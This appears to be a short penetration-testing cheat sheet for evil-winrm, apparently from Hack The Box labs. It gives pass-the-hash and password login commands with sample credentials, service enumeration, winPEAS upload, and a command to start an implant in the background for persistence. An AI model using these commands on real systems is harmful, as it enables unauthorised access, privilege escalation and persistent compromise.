evil-winrm is used to take advantage of machines with port 5985 or 5986 open which is Powershell Remoting.This will provide shell level access to the machine with the user account that you have compromised.
You can auth either with a hash or password
Supports SSL
Connect with pass the hash attack
evil-winrm -i 10.10.100.15 -u administrator -H "c2597747aa5e43022a3a3049a3c3b09d"
evil-winrm -i 10.10.100.15 -u a-whitehat -p "bNdKVkjv3RR9ht"
I have had issues with evil-winrm running properly on non kali Linux distros such as Ubuntu.
One simple work around is to pull a Kali Docker image and utilize that
docker pull kalilinux/kali-rolling
sudo docker run --tty --interactive kalilinux/kali-rolling
evil-winrm -i 172.16.2.5 -u 'DANTE.ADMIN\jbercov' -p mypass123
copy files from host into evil-winrm docker container
sudo docker cp /opt/winPEASx64.exe 3faed2add6c3:/opt
docker cp /home/ubuntu/Documents/htb/cicada/exploit/cicada.htb.exe bbf6c66e54c3:/opt
evil-winrm Service enumeration
you can use a builtin from evil-winrm to enumerate services on a remote endpoint
services
Path Privileges Service
---- ---------- -------
C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe False ADWS
C:\Windows\HQbCgOtZ.exe False fGnb
C:\Windows\qiFePsnh.exe False fYCF
C:\Windows\FxRmIulx.exe False gbkS
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe True NetTcpPortSharing
C:\Windows\rIiHdlwq.exe False odgx
--snip--
use the builtin for evil-winrm to upload files from your attackbox to the remote host
upload /opt/winPEASx64.exe
Info: Uploading /opt/winPEASx64.exe to C:\Windows\system32\spool\drivers\color\winPEASx64.exe
start your implant in the background so if your evil-winrm shell dies your implant will continue to run
cmd.exe /c start /b C:\Windows\System32\spool\drivers\color\cicada.htb.exe